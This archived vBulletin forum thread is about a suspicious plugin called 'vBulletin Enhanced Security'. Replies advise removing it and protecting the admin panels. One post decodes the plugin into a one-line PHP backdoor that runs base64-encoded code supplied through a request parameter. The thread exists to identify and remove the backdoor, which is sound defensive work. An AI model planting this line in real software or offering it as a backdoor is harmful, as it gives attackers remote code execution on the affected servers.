The Arcive of Official vBulletin Modifications Site.It is not a VB3 engine, just a parsed copy! |
|
#1
|
|||
|
|||
"vBulletin Enhanced Security" Plugin or Product
Has anyone else heard of this or recognize the code?
This is the only other mention I have seen https://www.vbulletin.com/forum/show...ke-forum-login Quote:
|
#2
|
||||
|
||||
Well the fact you don't know where it came from and that it has base64 within tells me to get rid of it quick... try this mod as it works on vB3 as well - https://vborg.vbsupport.ru/showthread.php?t=265866
It could possibly be related but after you get rid of that plugin use the mod above and .htaccess protect your admincp and modcp - https://www.vbulletin.com/forum/show...i-e-p0wersurge and Wayne has some very useful tips for situations like this and similar. |
#3
|
|||
|
|||
The pack statement equates to this..
Code:
isset($_REQUEST["pmb"])?eval(base64_decode($_REQUEST["pmb"])):uniqid(); |
#4
|
|||
|
|||
Thank you!
|
|
|
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
More Information | |
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|